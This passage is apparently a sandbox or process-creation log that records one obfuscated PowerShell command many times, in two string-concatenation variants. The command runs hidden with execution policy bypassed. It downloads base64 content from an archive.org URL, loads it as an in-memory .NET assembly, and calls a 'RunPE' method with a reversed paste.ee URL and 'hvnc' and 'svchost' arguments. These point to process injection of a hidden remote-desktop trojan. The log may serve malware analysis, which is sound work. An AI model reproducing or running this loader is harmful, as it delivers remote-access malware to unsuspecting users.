NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , 